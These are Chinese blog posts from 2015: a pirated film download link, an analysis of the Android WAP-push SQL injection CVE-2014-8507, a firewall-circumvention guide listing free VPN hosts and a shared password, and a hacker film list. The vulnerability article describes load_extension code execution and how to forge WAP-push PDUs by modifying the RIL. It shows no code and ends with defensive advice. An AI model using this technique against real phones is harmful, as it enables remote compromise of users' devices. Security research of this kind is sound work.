超能陆战队720P下载,可云播,可下载,可分享 资源分享

其实是朋友想看,让我帮忙搜索一下,但度娘给的好多都是推广,比如这个:


好了,本人直接放出超能陆战队720P下载地址吧: 

链接:http://pan.baidu.com/s/1i3mYI7V 密码:spnr 

这是效果图{可云播,可下载,可分享给好友}:


大家有什么要看的电影或者是什么论坛VIP资源下载,可以留言或者是直接QQ联系我哦。

标签: 分享

Mrxn 发布于 2015-3-30 13:07

一条短信控制你的手机! Android平台的SQL注入漏洞浅析 技术文章

0x0前言

14年11月笔者在百度xteam博客中看到其公开了此前报告给Google的CVE-2014-8507漏洞细节——系统代码在处理经由短信承载的WAP推送内容时产生的经典SQL注入漏洞,影响Android 5.0以下的系统。于是对这个漏洞产生了兴趣,想深入分析看看该漏洞的危害,以及是否能够通过一条短信来制作攻击PoC。

在断断续续的研究过程中,笔者发现了SQLite的一些安全特性演变和短信漏洞利用细节,本着技术探讨和共同进步的原则,结合以前掌握的SQLite安全知识一同整理分享出来,同各位安全专家一起探讨Android平台中SQLite的安全性,如有错误之处,也请大家斧正。

0x1起:食之无味,弃之可惜

鼎鼎大名的SQL注入漏洞在服务器上的杀伤力不用多说,可惜虎落平阳被犬欺,SQL注入漏洞在Android平台长期处于比较鸡肋的状态。比较典型的漏洞例子可以参考:http://www.wooyun.org/bugs/wooyun-2014-086899

虽然Android平台大量使用SQLite存储数据导致SQL注入很常见,而SQL注入的发现也相对简单,但其危害十分有限:在无其他漏洞辅助的情况下,需要在受害者的手机上先安装一个恶意APP,通过这个恶意载体才可能盗取有SQL注入漏洞的APP的隐私数据(如图1)。很多人会说,都能够安装恶意APP了,可以利用的漏洞多了,还要你SQL注入干嘛。正是因为这个原因,导致SQL注入漏洞一直不被大家所关注。

1

0x2承:远程攻击的大杀器

14年TSRC平台的白帽子雪人提出了一种存在已久,在Android平台却鲜未被提起的SQL注入利用方式:load_extension。通过一些简单漏洞的配合,SQL注入漏洞可以达到远程代码执行的可怕威力。

简单来说,为了方便开发者可以很轻便的扩展功能,SQLite从3.3.6版本(http://www.sqlite.org/cgi/src/artifact/71405a8f9fedc0c2)开始提供了支持扩展的能力,通过sqlite_load_extension API(或者load_extensionSQL语句),开发者可以在不改动SQLite源码的情况下,通过动态加载的库(so/dll/dylib)来扩展SQLite的能力。

2

便利的功能总是最先被黑客利用来实施攻击。借助SQLite动态加载的这个特性,我们仅需要在可以预测的存储路径中预先放置一个覆盖SQLite扩展规范的动态库(Android平台的so库),然后通过SQL注入漏洞调用load_extension,就可以很轻松的激活这个库中的代码,直接形成了远程代码执行漏洞。而在Android平台中有漏洞利用经验的同学应该都很清楚,想要把一个恶意文件下载到手机存储中,有许多实际可操作的方式,例如收到的图片、音频或者视频,网页的图片缓存等。类似的案例笔者也见到过,如下图远程利用SQL注入load_extension在某APP中执行了恶意的SQLite扩展。

3

0x3转:攻与防的对立统一

也许是SQLite官方也意识到了load_extension API的能力过于强大,在放出load_extension功能后仅20天,就在代码中(http://www.sqlite.org/cgi/src/info/4692319ccf28b0eb)将load_extension的功能设置为默认关闭,需要在代码中通过sqlite3_enable_load_extensionAPI显式打开后方可使用,而此API无法在SQL语句中调用,断绝了利用SQL注入打开的可能性。

4

凑巧的是,出于功能和优化的原因,Google从 Android 4.1.2开始通过预编译宏SQLITE_OMIT_LOAD_EXTENSION,从代码上直接移除了SQLite动态加载扩展的能力(如图4)。

5

虽然有了以上两层安全加固,但Android平台的安全问题往往不是这么容易就能够解决的。和Android平台五花八门的机型和系统版本一样,部分手机生厂商和第三方数据库组件并未跟随官方代码来关闭自身代码中SQLite动态加载扩展的能力,默认便可以直接使用SQL注入load_extension,导致这些手机或者APP极易被远程攻击。

总结来说,利用SQLite的load_extension远程实施攻击,适用于4.1.2以前的官方Android版本,或者是部分手机厂商的机器,又或者是使用到某些第三方数据库组件的APP。客观来看,这种攻击手法的攻击面并不算宽,并会随着高版本Android的普及和手机厂商的代码跟进而越来越窄。

那么除了最直接最暴力的load_extension攻击方式之外,SQL注入是不是又变得一无是处了?在魔术师一般的安全人员手里,不管多么不起眼的攻击方式都可能被用到极致。百度xteam的CVE-2014-8507就是一个很好的例子。

0x4合:一条短信就控制你的手机

接下来,我们回到最开始的问题,如何通过一条短信来控制手机?

事实上在看到CVE-2014-8507后,笔者花费了大量时间尝试在标准Android机器中,通过彩信发送恶意so库,随后通过短信激活恶意so库的方式,来实现控制手机。最终由于SQLite自身的sqlite3_enable_load_extension保护和系统代码其他若干个方面的限制,成功在smspush进程完成SQL注入后,却没有办法进一步利用恶意so库,无法完成正在意义上的控制手机。

另外一方面,百度xteam对CVE-2014-8507的利用已经很精彩,结合WAP推送处理代码的特点利用SQL注入提供数据,完成了打开通过短信任意APP的导出Activity的攻击,结合上其他的系统或者APP漏洞,不难达到真正意义上控制手机的效果。

作为狗尾续貂的补充,接下来和大家探讨一下如何在真实手机中通过自行构造PDU给任何Android 5.0以下机器发送含有SQL注入代码的WAP推送消息。

承载攻击的是WAP推送功能,而正常的短信APP无法通过短信发出WAP推送,通过短信群发等其他运营商提供的短信接口,也无法发出WAP推送消息。笔者通过一段时间对短信PDU格式的研究后发现,在Android vendor RIL之上进行一些修改,普通的手机也能够发出WAP推送消息。下图6的sendSMS函数(http://androidxref.com/4.4.4_r1/xref/frameworks/opt/telephony/src/java/com/android/internal/telephony/RIL.java)在每次发送短信前都会被系统调用,其中的第二个参数我们可以得到完整的原始PDU,通过对PDU内容进行一些修改,我们可以把普通的短信变成WAP推送消息。在此位置进行改动,随后PDU在替换后向底层传之后,也能成功的被基带解析并发送,接收方也能成功的接受并处理。

6

普通短信的PDU中,包含了信息中心的号码,发送方的号码,接收方的号码,时间戳以及短信内容文本(如下图7)。而WAP推送和普通短信的最重要区别,就是WAP推送承载的是WBXML格式的多媒体消息而不是普通文本,通过修改PDU中的类型标志位并附加上WBXML格式的内容,一条合法的WAP推送消息就能成功的从手机中发出。

7

为了方便测试和演示,笔者写了一个转换WAP推送的Xposed模块(如下图)。激活后,通过短信APP中发送给任何人的普通短信都会自动转换成包含CVE-2014-8507 SQL注入漏洞的WAP推送,自动打开对方手机的设置界面。关键的PDU处理代码请点击这里下载,请勿用于任何非测试用途。

8

0x5后记:如何使APP的数据库使用更安全

从2014年腾讯整体漏洞的数据来看,跟数据库安全相关的全部都跟SQL注入漏洞有关。因此,能够封堵SQL注入漏洞,基本上就能安全的使用数据库了。下面结合历史漏洞给出以下几点安全建议供大家参考(如果是腾讯的同学就方便多了,我们终端安全团队为业务定制了数据库安全组件):

1.   不直接使用原始SQL语句,而是使用具备预编译参数能力的SQL API;

2.   如果一定要使用原始SQL语句,语句中不应有进行任何字符串拼接的操作;

3.   如非必要,记得主动调用SQL API关闭动态加载扩展的能力;

4.   使用数据加密(如SqlCipher)扩展SQLite数据存储的安全性。

0x6相关链接

[1] http://lcx.cc/?i=4428

[2] https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-8507

[3] http://xteam.baidu.com/?p=167

[4] http://www.sqlite.org/cgi/src/tree?ci=trunk

[5] https://android.googlesource.com/platform/external/sqlite/

[6] https://android.googlesource.com/platform/frameworks/base/+/android-4.4.4_r2.0.1/packages/WAPPushManager/

[7] http://androidxref.com

[8] http://www.gsm-modem.de/sms-pdu-mode.html


Mrxn 发布于 2015-3-29 21:37

再介绍几条可翻墙的途径,Mrxn助你浏览墙外的大好世界-解决Google、Facebook、Youtube及Twitter等被墙问题 翻墙工具

再介绍几条可查资料的途径,Mrxn助你浏览墙外的大好世界-解决Google、Facebook、Youtube及Twitter等被墙问题

安卓,苹果,Mac,Windows 三平台支持的,免费加速器下载 2020最新可用 下载链接:点击下载

Ps:若发现好用的查资料途径,本文都会持续更新到这篇文章,欢迎收藏本文以便获取最新的查资料方法。本文所介绍方法,若无法使用请留言反馈(个别方法可能存在临时访问故障,您可以先尝试其他方法)。

一、查资料浏览器

查资料的浏览器大部分基于GoAgent代理,大同小异,就不一 一列出了。安装使用都比较简单,就不截图介绍了。

A. 天行浏览器


Windows版下载地址: http://pan.baidu.com/s/1i3mYF2l

(防止失效,附上分享专辑链接: http://yun.baidu.com/pcloud/album/info?query_uk=4097774579&album_id=8573337877413618448

IPhone版下载地址:

①、越狱版  : 链接:http://pan.baidu.com/s/1i3Cbm1v 密码:ei9x

②、Appstore https://itunes.apple.com/cn/app/id835702331

Android版下载地址: 链接:http://pan.baidu.com/s/1o6qSn6i 密码:izt3

B. 畅游无限浏览器


下载软件:

其实百度搜索就可以下载到了,为了方便一些比我还懒的人,还是上传到百度网盘分享下吧!

下载地址:  链接: http://pan.baidu.com/s/1eQ6bEDG 密码: akym

畅游无限浏览器Mac版 ,建议,使用前,看看那个《使用指南》--------下载地址:https://github.com/yongmook/MacGo

二、VPN查资料

VPN一般指虚拟专用网络,那么VPN查资料也就是通过建立一个国外的虚拟专用网络,绕过牛逼的天朝防火墙GFW来 访问国外的网站,比如Google、Facebook、Youtube及Twitter等。

所谓VPN查资料,我们必须先找到一个VPN服务器(IP),可以是自己购买国外的VPS搭建,也可以是用他人已搭建好的VPN服务。本文是小白专用,如何搭建VPN这种高大上的的项目就不在这啰嗦了。

在分享VPN查资料办法之前,先分享几个待会要用的免费VPN获取网站及方法:

①、3月最新补充:VPNCUP

VPNCUP是我最新发现的vpn服务器(免费产品),自去年重新开通免费服务后,又一次暂停了免费用户服务。祈祷能早日再次开通免费服务!稍微遗憾的是就在12月22日,VPNCUP的免费服务暂时关闭了!(摘自无主题博客)

先来看下官方通告:


细看通告可发现,其实VIP用户还是可以继续使用的!

如何成为VIP用户呢?购买VPNCUP的最低【1G/年】套餐即可成为VIP用户(圣诞节7折优惠:7元即可)。


购买之后,立马就开通了:


特意试用了下,发现速度非常给力,Youtube几乎无需缓冲,即点即看,非常赞:


看了下Youtube,然后进后台才发现免费服务器是限制了 1G/月 的:

vcup5.png

看来只是和用于查资料看网页的人士使用,看视频啥的就别折腾这个了!由于需要小小的花销(一包烟钱),所以这个VPN适合长期需要查资料流量国外网页、且对稳定性需求比较高的朋友使用!

喜欢的话就赶紧试试吧!

注册传送门VPNCUP

至于,拿到VPN服务器的地址之后该如何使用,请继续查看下文关于Windows系统VPN的简单设置教程!

②、WuliaoVPN(感谢网友留言推荐!)

用浏览器打开:http://wuliaovpn.com/usa-server,下拉到底部找到一个评论框一样的滑动拉链:

vpn1.png


右拉到底解锁后,点击下方的【Get VPN info】按钮就能得到VPN地址信息了:


Ps:该网站还提供CN服务器,估计是用于国外查资料看天朝网站内容,所谓你想翻出去,也有人想翻进来,废话不多说,地址是:http://wuliaovpn.com/china-server/,经供参考。

③、FreesstpVPN(感谢网友留言推荐!)

地址:http://freesstpvpn.net/ ,首页就直接给出了VPN服务器IP、帐号以及密码:


euro SSTP VPN Host Name: 93.115.84.195 (欧洲) 
us SSTP VPN Host Name: 198.7.58.147 (美国) 
ca SSTP VPN Host Name: 142.4.206.228 (加拿大) 
euro, us & ca SSTP VPN Username : vpnbook (帐号) 
euro, us & ca SSTP VPN Password : m6stUTru (密码)
us SSTP VPN Host Name: vpn.freesstpvpn.net  euro, us & hk SSTP VPN Username : freesstpvpn  euro, us & hk SSTP VPN Password :
  

④、二师兄VPN

这是一个国内的VPN服务,有收费的也有免费的,难得可贵的是,免费的帐号除了限制使用免费VPN服务器之外,没有其他任何限制,说白了就是除了速度稍微凑合了点,其他都非常不错!

获取方法也非常简单,直接注册帐号就能使用了!

怎么注册帐号就不啰嗦了,注册地址是:http://www.2-vpn2.org

注册之后,点击网站导航中的【线路列表】,就能看打所有的VPN服务地址了,当然免费用户只能看到前2个免费VPN地址和当前在线人数:

上几个就是张戈测试可用的免费VPN地址了,特别说明下:前2个免费VPN,获取的帐号是存在有效期的,貌似是12个小时还是多少。当你发现无法登陆时,重新打开网站获取一次新的密码即可;而二师兄VPN也有小限制,免费帐号必须每隔三天登陆一次二师兄的网站进行帐号激活,否则无法连接VPN服务器。

Ps:如何连接VPN我就不赘述了,实在不会的看这里==>百度经验

连接VPN之后,你可能无法使用局域网的一些服务了,比如公司的一些文件服务器、FTP等。解决办法也很简单,要么断开VPN连接,要不打开CMD窗口,使用route命令新增一条本地路由即可:

比如,你的局域网是192.168.2.1~254,IP段则为:192.168.2.0/24,网关是192.168.2.1。

那么执行如下2条命令即可生效:


route add 192.168.2.0/24 mask 255.255.255.0 192.168.2.1

ipconfig/flushdns


其他的查资料方法详情请见我的另一篇文章:


Mrxn收集整理发布2014+2015最新梯子,助你成功查资料,观看墙外的世界,每月更新



Mrxn 发布于 2015-3-28 21:24

黑客题材电影、电视剧大合集 资源分享

电影:

1.《战争游戏》WarGames

1.png

剧情简介:

1983年,电影《战争游戏》开黑客影片先河。故事发生在里根总统任期,当时正值冷战高峰。苹果Mac机尚未诞生,电脑还只是科学怪才专属玩具,影片用大众对核战争和未知新科技的恐惧好好地把观众吓了一把。影片主角是名叫大卫·莱特曼的电脑天才,可自由进入学校电脑系统改动考试分数,因此全无学业之忧,整日将时间耗在电子游戏上。一日误撞上了“北美空防系统”(NORAD)的一台超级电脑,大卫用它玩起了“第三次世界大战”的模拟游戏,他不知道的是,这个游戏比他想象的要来得真实:当大卫退出,游戏并没有结束,NORAD的电脑仍然认为苏联人发动了核战争,对两个超级大国的电脑而言,战争游戏并没有结束……

影片来源http://v.qq.com/search_player.html

2.《通天神偷》Sneakers

11.png                    

剧情简介:

《通天神偷》讲述的是一群代号SNEAKERS的“合法黑客”的故事。SNEAKERS是精通电脑的工业间谍,银行、政府机关等重要机构出钱请他们“黑”自己的电脑系统,以此检测系统的安全性。比肖普是这伙人的头,沉默,低调,有一段不太见得光的过去,典型的黑客。 
一日,一个政府机构找上门,要求比肖普的人在网上盗取一个电脑软件,拥有它便可以开启全球所有的秘密电脑资源。拒绝是不可能的,因为它掌握了比肖普一干人过去所有的秘密。真正的幕后大坏蛋是国际头号科技罪犯Cosmo,他伙同政府内的腐败分子将比肖普一群人“逼上绝路”……

影片来源:http://v.qq.com/search.html

3.《异度空间》THE LAWNMOWER MAN (1992)  又名《割草者》

111.jpg

剧情简介:

《异度空间》是第一部建立在虚拟空间的影片。约伯·史密斯是一个智力只有儿童水平的割草人,他定期为劳伦斯·安吉洛博士修剪草坪。安吉洛效力于一家政府秘密机构,负责为军队训练高智能大猩猩。安吉洛与机构的合作出了问题,智障的约伯吸引了他的注意力。他决心以约伯为实验对象,把他的智力恢复到正常水平。实验结果好得出乎意料:约伯成了这个星球上最聪明的人。而他的潜能还在不断发展,慢慢地他变成了某种非人的异类…… 

4.《网络惊魂》 The Net(1995)

2.png

剧情简介:

电脑奇才安吉拉·贝内特专门研究电脑程序中的各种病毒。她隐居在加利福尼亚过着与人无交往的生活。因为无意中收到记录有黑客犯罪证据的软盘,她掉入了敌人设下的陷阱:出国旅游,碰上的美男原来是杀手;她回到家发现车丢了,房子被出卖,而她也被指控为罪犯…… 
安吉拉开始反击,她通过网络发现一群自称“禁卫军”的电脑罪犯控制了卡萨德拉尔软件公司,他们卖出数据保护程序并实际设下埋伏,从而对所有客户的系统进行复制。安吉拉冒险打入卡萨德拉尔软件公司,发现自己原来的身份已被一名“禁卫军”所顶替。她在后来的一次电脑交易会上联机上网,用一种特殊的电脑病毒摧毁了“禁卫军”的数据库。

影片来源:http://www.iqiyi.com/v_19rrn57bh4.html?fc=87451bff3f7d2f4a#vfrm=2-3-0-1(付费)

5.《黑客》Hackers(1995)

222.jpg

剧情简介:

绰号“零度冷”的戴德·墨菲是黑客中的传奇人物。1988年,他单枪匹马弄瘫了华尔街的1507台电脑,导致全球金融危机。11岁的戴德因此在联邦调查局的档案中挂上了名,并被禁用键盘直到18岁生日。7年未碰一个数码……戴德充满饥渴。 
绰号“酸蚀”的凯特·利比是一名在信息高速公路上横行无阻的女黑客。当“零度冷”和“酸蚀”相遇,一场不可避免的两性大战在硬驱上展开。此时“瘟疫”,一名发受雇于跨国公司的黑客高手出现了,他不但想借网络欺诈数百万美元还想嫁祸戴德、凯特和他们的朋友。为洗脱罪名,戴德、凯特招募了一帮黑客高手加入他们对大公司阴谋的反击战。

6.《杀人硬件》Virtuosity (1995)

2222.png

剧情简介:

1999年,洛杉矶,政府执法技术中心开发出用于训练警探的模拟机原型。这种虚拟现实模拟机装载有最先进人工智能技术,使用者需追捕电脑生成罪犯席德6.7(结合人类所有邪恶),以锻炼他们的侦探技巧。但是,这个复杂的“猫捉老鼠”系统有一个致命的后果:狡猾的席德6.7摆脱束缚离开了虚拟空间,进入现实世界作恶。前警察帕克·巴恩斯被认为是最有机会制服席德6.7的人。 
在犯罪行为专家卡特的帮助下,巴恩斯必须穿梭于现实和虚拟世界,在新千年之前抓住席德。同时,巴恩斯在席德6.7身上发现了杀害他的妻子和女儿的变态杀手的影子。这场猎人的游戏变得复杂起来,赌注也更加高昂。

影片来源:http://www.iqiyi.com/w_19rqq48uo1.html#vfrm=2-3-0-1

7.《约翰尼记忆术》 Johnny Mnemonic (1995)  又名《非常特务》、《捍卫机密》

3.png

剧情简介:

2021年,世界出现巨大的电脑网络。大半的人类都死于电子设备发出的电磁波产生的环境污染。信息成为最昂贵的商品,黑客猖獗,因此最宝贵的信息必须通过人类大脑传送。 
约翰尼就是这样一个负责信息传递的专业人士。一次,约翰尼受雇于两名从世界第三大跨国公司Pharmkom叛逃的科学家,为他们传递无价数据。 
约翰尼大脑中的记忆芯片无法承受超负荷的上载,如果不及时找到解压密码下载信息,他将死亡。此外,Pharmkom雇用了世界最大的犯罪集团Yakuza,要取约翰尼的人头,以追回无价信息。 
影片来源:http://v.qq.com/search_player.html

8.《第十三层》 TheThirteenth Floor(1999)又名《异次元骇客》

22.png

剧情简介:

故事开始在1937年的洛杉矶,哈蒙德·富勒在与情人幽会后回到酒店,他给某人留下一封信后,赶回家见妻子。当他躺倒在床上,突然时空转换到了1999年的洛杉矶…… 
在洛杉矶一个商业区的第13层办公楼上,道格拉斯·霍尔和哈南·富勒创造了一个虚拟的1937年代洛杉矶。某日,霍尔一觉醒来发现哈南死了,自己成了头号嫌疑犯。 
霍尔无法回忆起是否参与了谋杀,为了弄清真相,他往返于现实和1937年的虚拟世界,这种双重生活使霍尔在现实世界的存在变得日益模糊……富勒在死亡之前似乎也被牵扯进类似双重生活。神秘的美女简的出现更加使现实和虚幻世界的界限模糊起来。

影片来源:http://v.qq.com/search_player.html

9.《剑鱼行动》Swordfish (2001)

33.png

剧情简介:

加布利尔·希尔是个在江湖上闯荡多年的间谍特工,他妄想建立一个属于自己的极端爱国主义组织。为了筹集这个组织招兵买马所需资金,加布利尔决定冒险闯入网络空间,窃取一笔高达几十亿美金的基金。希尔需要一个顶尖电脑黑客的帮助。他盯上了斯坦利·吉森。 
斯坦利曾是世界上两个最顶尖的电脑黑客之一,他将FBI计算机监视系统搞了个天翻地覆,当然他也为此坐了牢。现在他住在一个破拖车里,老婆和他离了婚,带着小女儿霍莉嫁给了专拍色情片的大老板。加布利尔来请斯坦利出山,答应得手后帮斯坦利重获女儿的监护权。斯坦利答应铤而走险,他成了一颗身不由己的棋子……

影片来源:http://tv.sohu.com/20100112/n269518993.shtml

10.《黑客帝国》系列2003

444.jpg

剧情简介:

第一部
在矩阵中生活的一名年轻的网络黑客尼奥发现,看似正常的现实世界实际上似乎被某种力量控制着,尼奥便在网络上调查此事。而在现实中生活的人类反抗组织的船长莫菲斯也一直在矩阵中寻找传说的救世主,就这样在人类反抗组织成员崔妮蒂的指引下,两人见面了,尼奥也在莫菲斯的指引下,回到了真正的现实中,逃离了矩阵,这才了解到,原来他一直活在虚拟世界当中,真正的历史是,在20XX年,人类发明了AI(人工智能),然后机械人叛变,与人类爆发战争,人类节节败退,迫不得已的情况下,把整个天空布满了乌云,以切断机械人的能源(太阳能),谁知机械人又开发出了新的能源—生物能源,就是利用基因工程,人工制造人类,然后把他们接上矩阵,让他们在虚拟世界中生存,以获得多余的能量,尼奥就是其中一个。尼奥知道后,也加入了人类反抗组织,在莫菲斯训练下,渐渐成为了一名厉害的“黑客”,并渐渐展露出,与其他黑客的不同之处,让莫菲斯也更加肯定他就是救世主,就在这个时候,人类反抗组织出现了叛徒,莫菲斯被捕,尼奥救出了莫菲斯,但在逃跑过程中,被矩阵的“杀毒软件”特工杀死,结果反而让尼奥得到了新的力量,并复活了,真正的成为了救世主,并把在矩阵无所不能的特工杀死了(删除了)  从此,人类与机械的战争,进入了一个新的时代。

影片来源:http://www.yaku.tv/programs/162570.html?ptag=vsogou

第二部
上回说到尼奥终于意识到自己的能力和使命,在中弹“复活”的同时,他也变成了无所不能“救世主”。结尾的“飞升”象征着人类超级英雄的诞生:尼奥将带领锡安基地的人民,打响对机器世界的反击战,并将以胜利者的姿态结束这场战斗,还人类以自由之身。他的使命会实现吗?母体会那么甘心被摧毁吗?  实际上,整个是尼奥探寻自己使命背后真相的过程,他要为自己的行动寻找一个可以接受的理由。在上集打败密探史密斯、救出墨菲斯之后,尼奥随同亲密爱人崔尼蒂和其他战友一起,乘坐Nebuchadnezzar号飞船返回地球上最后一个人类据点——锡安基地。在那里,他们和其他自由战士们聚集到了一起,其中包括墨菲斯的甜蜜冤家——奈奥比美眉。另外,基地的政治家们也上场了。  就在这时,母体系统决定“先下手为强”,派遣了为数250000的电子乌贼大军,开始进攻锡安基地,微弱的基地防守力量根本不足以对抗如此强大的机甲兵团,看来人类最后的香火也岌岌可危;当然,墨菲斯他们的飞船上有各种各样的资料,自然少不了中国那几本名为《左传》《史记》之类古籍的电子版本,尼奥他们一下便想到了“围魏救赵”的良招,决定再次潜入母体,从内部破坏它,最后达到消灭机甲兵团的目的。同时,尼奥也想再和“先知”谈一谈,以便更多地了解自己的神圣使命。  可是,“母体取经”的道路注定是凶险多端的:在寻找母体系统内唯一知道系统弱点的“制钥者”的过程中,NEO、墨菲斯和翠尼蒂遇到了前所未有的困难:敌人的能力升级了,数量更是增多了,尼奥的超能力受到致命的挑战,墨菲斯和翠尼蒂对NEO的信心也受到无情事实的打击。究竟尼奥他们能不能完成任务后从母体内部全身而退?锡安基地的命运如何? 

影片来源:http://www.yaku.tv/programs/67094.html

第三部
面对如潮的电子乌贼,人类城市危在旦夕,墨菲斯和崔妮蒂等欲与入侵者决一死战。此时,“救世主”尼奥的身体和思想却意外分离,后者再度陷入到“母体”中。墨菲斯和崔妮蒂也不得不回到“母体”和守护天使一起寻找他。  锡安的局势越来越危险,机器的攻击却丝毫没有因为人类的反抗而减弱。此时,被叛徒射瞎双眼的尼奥,依然想通过希望去实现预言。这时,特工史密斯控制了先知,并变得越来越强大,威胁到了整个"母体"的稳定。在返回锡安的途中,飞船遭到电子乌贼的突袭,崔妮蒂死了,重伤的尼奥来到机器城市。  在和机器的谈判中,机器答应为了人类和机器的共同利益,尼奥去消灭史密斯,而机器不再摧毁锡安。人类迎来新的和平。

影片来源:http://www.yaku.tv/programs/116909.html

11.《骇客追缉令》2004

6.jpg

剧情简介:

凯文密尼克可称为有史以来最厉害的电脑骇客,他侵入家电信公司,入侵联邦调查局的电脑,在网路世界中成为最难以捉摸的骇客之王,然而他却希望能遇上一个真正的挑战,当他开始入侵著名物理学家兼电脑天才下村勤的电脑系统后,他的愿望终于实现,并且可能超出他所能应付的……

12.《黑客狙击》 2004

1.jpg

剧情简介:

市局网络监测处刘处长接到报告,本市几家大网站均受到来自境外不明身份者的攻击。不仅如此,几家大型企业的网络系统也在严重的破坏中,被迫关闭。接到报警后,刘处长把任务交给关小雨。虽然,聪明漂亮的关小雨从警没多长时间,但直觉告诉她,目前黑客的举动只是一种搔扰行为,后面很有可能还会有更大的举动,而他们真正的目标可能是金融系统。为此,关小雨当即立断,向本市几家重点金融系统发出预警通报。

视频来源:http://v.baidu.com/kan/movie/

13.《防火墙》Firewall(2006)

333.png

剧情简介:

电脑安全专家杰克史坦菲德为一家位于西雅图的太平洋银行工作。他是一名备受信赖的高阶主管,多年来负责设计最有效的防盗电脑系统,透过层层的密码和 防火墙,阻止日益猖獗的电脑骇客盗取银行的资产。 
杰克在公司的待遇优厚,让他、他身为建筑师的妻子贝丝以及他们的一对小孩过着优裕的生活,包括一栋位于市郊高级住宅区的豪宅。 
但是杰克的防盗系统却有一个致命弱点,那就是他自己,有一名残暴凶狠的歹徒决定利用这弱点盗取银行巨款。 
好几个月来,比尔考克斯一直在仔细观察杰克和他的家人,并利用各种先进的电子仪器,监控他们上网的活动,窃听他们的电话,熟知他们的日常作息,并窃取他们最隐私的资料。他知道他们小孩的朋友的名字,也知道他们的病史,更知道他们居住的社区保全系统的密码。 
他花了将近一年的时间了解杰克一家人的每一个生活细节,现在终于可以展开行动。他率领一组人马闯入史宅,把贝丝和她的小孩软禁在自己的家里,而杰克则被迫帮助他服务的太平洋银行窃取一亿美元的巨款。 
杰克尝试向人求救和救出家人的每一个行动都被考克斯识破和阻止,于是逼不得已只好破解自己设计的电脑安全系统,将一亿美元巨款汇入考克斯的海外银行帐户,不但让他自己成为罪犯,也被迫消灭考克斯犯案的所有证据。他在受到严密的监控下,只有几个小时的时间可以完成汇款,并找到歹徒看似天衣无缝的阴谋的漏洞,希望能以毒攻毒,拯救他一家人的性命。

影片来源:http://film.qq.com/cover/f/f619vlegt0pc3eo.html(付费)

14.《虎胆龙威4》Live Free or Die Hard,Die Hard 4.0 (2007)

66.jpg

剧情简介:

恐怖分子计划通过黑客技术在7月4日美国国庆日这天令全美电脑系统瘫痪,整个美利坚民族又一次陷入危难。那个隐藏在恐怖计划之后的神秘天才也许摸清了每个电脑程序的故障,却忘了一件事–已经退休的老警官约翰·麦克莱恩,总会在危急时刻重出江湖,誓将每个该死的罪犯抓入法网!

影片来源:http://www.yaku.tv/programs/118289.html

15.《龙纹身的女孩》2009

0.png

剧情简介:

讲述一位神奇的女黑客和一位记者之眩间的故事。1966年的12月29日,16岁的少女哈丽特•范格尔神秘消失。四十年后一位名叫米克尔•布卢奎斯特的记者接受了一项特别任务。商业巨头亨里克•范格尔委托他去调查范格尔家族的过去。关于哈丽特的一切都被笼罩在迷雾之中。米克尔辞去了他在《千禧年》杂志的工作,并得到一位名叫丽思贝丝•萨兰得的女黑客的帮助。两个人逐渐发现范格尔家族的历史充满了黑暗而血腥的谜团……

影片来源:http://v.pptv.com/show/Lyb3dd1DsicFU0jo.html

16.《无懈可击》 2007

8.jpg

剧情简介:

故事发生在当代某演习地。我军某部正准备组织大规模军演,不料此时计算机系统遭黑客攻击,这预示着此次07演习要么推迟,要么宣告失败。紧急时刻,信息指挥中心戴天明(刘鉴 饰)想起了军校毕业的博士生方颖(高露 饰),此时的方颖正要出国参加国际信息研讨会,其男友姚力(戚迹 饰)奉戴天明之命驾驶直升飞机将其途中拦下,带到指挥所。方颖发现要找到隐藏的黑客决非易事,必须强行通过07任务终端,而对手也是远程控制方面的高手,方颖发挥出先于制敌的反攻手段,逐步向黑客发起攻击,眼下,距军演开始的时间已不多了,最终,她能锁定这个特殊的黑客吗…..

影片来源:http://www.1905.com/vod/play/306589.shtml

16.《社交网络》2010

555.jpg

剧情简介:

2003年秋,在哈佛大学中,恃才放旷的天才学 生马克·扎克伯格被女友甩掉,愤怒之际,马克利用黑客手段入侵了学校的系统,盗取了校内所有女生的资料,并制作名为“Facemash”的网站供同学们对辣妹评分。他的举动引起了轰动,一度令哈佛大学的服务器几近崩溃,马克因此遭到校方的惩罚。正所谓因祸得福,马克的举动引起了温克莱沃斯兄弟的注意,他们邀请马克加入团队,共同建立一个社交网站。在没有明确拒绝他们的同时,马克和室友爱德华多·萨维林建立了自己的社交网站。

他们没有意识到,这个看似小小的网站制作计划,却带来了全球性网络社交的革命。凭借他们创立的名为facebook的网站,在短短六年时间内就聚集了5亿用户,马克成为了历史上最年轻的亿万富翁,彻底改变了他和他身边人的生活。但是这位成功的企业家,在辉煌的事业成就和巨额的财富背后,却不得不面对与朋友的分道扬镳,以及更多让他身处利害关系的陷阱当中 。

影片来源:http://www.tudou.com/albumplay/7iETRTOmjU4/efQM7Nkn__c.html?fm=ala  

17.《创战纪》2010

5555.jpg

剧情简介:

著名的电脑游戏开发名家凯文·弗林(杰夫·布里吉斯 饰)在开创自己最新游戏的过程中离奇失踪,多年之后他的儿子——27岁的科技天才萨姆·弗林(加内特·赫德兰 饰)进入父亲封闭多年的办公室寻找父亲失踪的真相。他找到了父亲工作的密室和电脑,在一系列键盘操作之后萨姆发现自己神奇的被数字化,进入了父亲创造的电子网络游戏世界。在这里凯文被当作程序被迫参加了一场场惊心动魄,生死一线的游戏大战,还惊奇地发现父亲在电子网络世界创造的一个“替身”——克鲁(杰夫·布里吉斯 饰)居然想置他于死地。

在危急时刻萨姆被一位突然出现名叫“葵拉”的女战士救走,并在一个隐蔽住所重遇被困在电子网络里20年的父亲。原来凯文·弗林在开发这一足以改变人类世界的电子网络世界过程中创造的“替身”克鲁背叛了他,克鲁控制整个电子网络世界,使他无法从关口回到人类世界。萨姆坚持要父亲和他一起重回现实世界,但是他们面对的是几乎无所不能的“克鲁”,还有“克鲁”妄图从电子世界关口进入和控制人类现实世界的惊天阴谋,父子俩和葵拉一起为了回家,为了阻止“克鲁”将要带给人类的灾难,在步步危机的电子网络世界展开了一段生死大历险。

影片来源:http://v.pptv.com/show/ibCXkYsowoN5Bvyc.html

18.《骇客军团故事》2012

66.jpg

剧情简介:

占领华尔街、反全球化运动袭卷全球,在伦敦的示威者纷纷带上有着一双细眼、山羊胡与诡异微笑的现代版盖伊.福克斯「V怪客」(V for Vendetta)的面具,维基解密的发起人亚桑奇莅临演说也戴了「V面具」,更引起示威者纷纷效尤,使得「V面具」俨然成为此波全球抗议示威中最独特的文化现象。导演布莱恩‧耐本伯格(Brian Knappenberger)《骇客军团故事》完整纪录这波方兴未艾、结合网路与现实的公民运动。

